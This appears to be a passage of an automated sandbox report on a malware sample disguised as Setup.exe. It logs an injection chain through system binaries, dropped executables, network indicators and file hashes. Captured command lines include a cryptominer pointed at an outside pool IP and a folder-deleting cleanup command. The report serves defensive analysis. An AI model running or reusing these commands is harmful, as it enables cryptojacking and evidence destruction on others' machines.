Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A
N/A N/A C:\ProgramData\IIJDBAKKKF.exe N/A
N/A N/A C:\ProgramData\ECGHCBGCBF.exe N/A
N/A N/A C:\ProgramData\IIJDBAKKKF.exe N/A
N/A N/A C:\ProgramData\ECGHCBGCBF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\ProgramData\IIJDBAKKKF.exe N/A
N/A N/A C:\ProgramData\ECGHCBGCBF.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5108 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 5108 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 5108 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 5108 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 540 wrote to memory of 4220 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 540 wrote to memory of 4220 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 540 wrote to memory of 4220 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 540 wrote to memory of 4220 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 540 wrote to memory of 4220 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 4220 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\ProgramData\IIJDBAKKKF.exe
PID 4220 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\ProgramData\IIJDBAKKKF.exe
PID 4220 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\ProgramData\IIJDBAKKKF.exe
PID 4220 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\ProgramData\ECGHCBGCBF.exe
PID 4220 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\ProgramData\ECGHCBGCBF.exe
PID 4220 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\ProgramData\ECGHCBGCBF.exe
PID 4060 wrote to memory of 936 N/A C:\ProgramData\IIJDBAKKKF.exe C:\Windows\SysWOW64\ftp.exe
PID 4060 wrote to memory of 936 N/A C:\ProgramData\IIJDBAKKKF.exe C:\Windows\SysWOW64\ftp.exe
PID 4060 wrote to memory of 936 N/A C:\ProgramData\IIJDBAKKKF.exe C:\Windows\SysWOW64\ftp.exe
PID 2052 wrote to memory of 4544 N/A C:\ProgramData\ECGHCBGCBF.exe C:\Windows\SysWOW64\ftp.exe
PID 2052 wrote to memory of 4544 N/A C:\ProgramData\ECGHCBGCBF.exe C:\Windows\SysWOW64\ftp.exe
PID 2052 wrote to memory of 4544 N/A C:\ProgramData\ECGHCBGCBF.exe C:\Windows\SysWOW64\ftp.exe
PID 4060 wrote to memory of 936 N/A C:\ProgramData\IIJDBAKKKF.exe C:\Windows\SysWOW64\ftp.exe
PID 2052 wrote to memory of 4544 N/A C:\ProgramData\ECGHCBGCBF.exe C:\Windows\SysWOW64\ftp.exe
PID 4220 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\Windows\SysWOW64\cmd.exe
PID 4220 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\Windows\SysWOW64\cmd.exe
PID 4220 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\Windows\SysWOW64\cmd.exe
PID 1644 wrote to memory of 2524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1644 wrote to memory of 2524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1644 wrote to memory of 2524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4544 wrote to memory of 948 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4544 wrote to memory of 948 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 936 wrote to memory of 2984 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 936 wrote to memory of 2984 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 936 wrote to memory of 2984 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 4544 wrote to memory of 948 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4544 wrote to memory of 948 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 936 wrote to memory of 2984 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 948 wrote to memory of 1392 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 948 wrote to memory of 1392 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 948 wrote to memory of 1392 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 948 wrote to memory of 1392 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 948 wrote to memory of 1392 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 948 wrote to memory of 1392 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 948 wrote to memory of 1392 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe"

C:\Windows\SysWOW64\more.com

C:\Windows\SysWOW64\more.com

C:\Users\Admin\AppData\Local\Temp\CUF.au3

C:\Users\Admin\AppData\Local\Temp\CUF.au3

C:\ProgramData\IIJDBAKKKF.exe

"C:\ProgramData\IIJDBAKKKF.exe"

C:\ProgramData\ECGHCBGCBF.exe

"C:\ProgramData\ECGHCBGCBF.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\ECFCBFBGDBKJ" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
NL 23.62.61.75:443 www.bing.com tcp
US 8.8.8.8:53 75.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 poocoin.online udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 18.53.55.162.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 businessdownloads.ltd udp
US 172.67.212.123:443 businessdownloads.ltd tcp
US 8.8.8.8:53 123.212.67.172.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 i.imgur.com udp
US 199.232.192.193:443 i.imgur.com tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 193.192.232.199.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
FI 135.181.22.88:80 135.181.22.88 tcp
US 8.8.8.8:53 88.22.181.135.in-addr.arpa udp
FI 65.109.127.181:3333 tcp
US 8.8.8.8:53 proresupdate.com udp
US 45.152.112.146:80 proresupdate.com tcp
FI 65.109.127.181:3333 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 146.112.152.45.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp
N/A 224.0.0.251:5353 udp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp

Files

memory/5108-0-0x00000000733E0000-0x000000007355B000-memory.dmp

memory/5108-1-0x00007FF9CD270000-0x00007FF9CD465000-memory.dmp

memory/5108-10-0x00000000733F2000-0x00000000733F4000-memory.dmp

memory/5108-11-0x00000000733E0000-0x000000007355B000-memory.dmp

memory/5108-12-0x00000000733E0000-0x000000007355B000-memory.dmp

memory/540-14-0x00000000733E0000-0x000000007355B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\83c1d0de

MD5 29bb1080acc37b87c5654d0623c73aa3
SHA1 22ba29867dc4d2d92d86f41ecd517b2d3149bffa
SHA256 2b792047e842492da5bcd7ec5140ca743769e13ac5e0ac3c6b57785c52081b51
SHA512 56e9b6498bbdb74f9a356c6637cec4651d854ccd4f6a09f0d7c135e0360fddd2741f82301fbf1b6298d1bee2252d5748229f938dfe206cdb1f1006a78451d589

memory/540-16-0x00007FF9CD270000-0x00007FF9CD465000-memory.dmp

memory/540-18-0x00000000733E0000-0x000000007355B000-memory.dmp

memory/540-20-0x00000000733E0000-0x000000007355B000-memory.dmp

memory/4220-25-0x0000000001490000-0x0000000001BDB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CUF.au3

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/4220-27-0x00007FF9CD270000-0x00007FF9CD465000-memory.dmp

memory/4220-30-0x0000000001490000-0x0000000001BDB000-memory.dmp

memory/4220-31-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\ProgramData\ECFCBFBGDBKJ\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\ECFCBFBGDBKJ\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\IIJDBAKKKF.exe

MD5 6cfddd5ce9ca4bb209bd5d8c2cd80025
SHA1 424da82e9edbb6b39a979ab97d84239a1d67c48b
SHA256 376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7
SHA512 d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8

memory/4060-118-0x00000000009D0000-0x0000000000EE3000-memory.dmp

C:\ProgramData\ECGHCBGCBF.exe

MD5 daaff76b0baf0a1f9cec253560c5db20
SHA1 0311cf0eeb4beddd2c69c6e97462595313a41e78
SHA256 5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c
SHA512 987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3

memory/2052-133-0x0000000000740000-0x0000000000988000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\79e51771

MD5 8d443e7cb87cacf0f589ce55599e008f
SHA1 c7ff0475a3978271e0a8417ac4a826089c083772
SHA256 e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a
SHA512 c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5

memory/4060-139-0x0000000072160000-0x00000000722DB000-memory.dmp

memory/4060-142-0x00007FF9CD270000-0x00007FF9CD465000-memory.dmp

memory/2052-141-0x0000000072160000-0x00000000722DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7a36fa28

MD5 c62f812e250409fbd3c78141984270f2
SHA1 9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806
SHA256 d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8
SHA512 7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092

memory/2052-143-0x00007FF9CD270000-0x00007FF9CD465000-memory.dmp

memory/4220-144-0x0000000001490000-0x0000000001BDB000-memory.dmp

memory/4220-148-0x0000000001490000-0x0000000001BDB000-memory.dmp

memory/4220-149-0x0000000001490000-0x0000000001BDB000-memory.dmp

memory/4060-153-0x0000000072160000-0x00000000722DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7c7da886

MD5 be7710cbe490d723692aed94bfb99278
SHA1 e308264ec4f0c29cd7595b7befe44e237212026f
SHA256 36d4e98807def23993a488e4dedeaddc084c82f25e38e431417a0e3222f57616
SHA512 5f6d55340323266126fe9a80f816a5fe11b92021b729e2fa3287618ab1fb63794108b8d37e49771adee1b15a8cdc65bc1534de0ee37c78023a0bb1457fdc4487

memory/2052-156-0x0000000072160000-0x00000000722DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7cc7f4d9

MD5 d2d8482a8651cc0c480896973a5e53f1
SHA1 cd56e7d65ce481fa1ae9dc0cb4a6be8f679343fe
SHA256 dd2a33dd79678a4366bf45c61646883770b8d96d687a8e69813b36106b21d216
SHA512 ccc3ce4a97e14df6fa20695e612c72470955bd07b552c86c680772b262c040e9e13c527c8d6da3b83b89655cd7e54085b7640abe0328518f863ebec4b70787d4

memory/4220-167-0x0000000001490000-0x0000000001BDB000-memory.dmp

memory/936-168-0x00007FF9CD270000-0x00007FF9CD465000-memory.dmp

memory/4544-169-0x00007FF9CD270000-0x00007FF9CD465000-memory.dmp

memory/4544-170-0x0000000072160000-0x00000000722DB000-memory.dmp

C:\ProgramData\ECFCBFBGDBKJ\VCRUNT~1.DLL

MD5 a37ee36b536409056a86f50e67777dd7
SHA1 1cafa159292aa736fc595fc04e16325b27cd6750
SHA256 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA512 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

C:\ProgramData\ECFCBFBGDBKJ\softokn3.dll

MD5 4e52d739c324db8225bd9ab2695f262f
SHA1 71c3da43dc5a0d2a1941e874a6d015a071783889
SHA256 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA512 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

C:\ProgramData\ECFCBFBGDBKJ\msvcp140.dll

MD5 5ff1fca37c466d6723ec67be93b51442
SHA1 34cc4e158092083b13d67d6d2bc9e57b798a303b
SHA256 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
SHA512 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

memory/4544-185-0x0000000072160000-0x00000000722DB000-memory.dmp

memory/948-188-0x00007FF9AC830000-0x00007FF9ADEA7000-memory.dmp

memory/2984-192-0x00007FF9CD270000-0x00007FF9CD465000-memory.dmp

memory/948-193-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2984-196-0x00000000010C0000-0x0000000001131000-memory.dmp

memory/1392-198-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/1392-201-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/1392-202-0x000002CAB72F0000-0x000002CAB7310000-memory.dmp

memory/1392-200-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/1392-204-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/1392-203-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/1392-205-0x0000000140000000-0x00000001407DC000-memory.dmp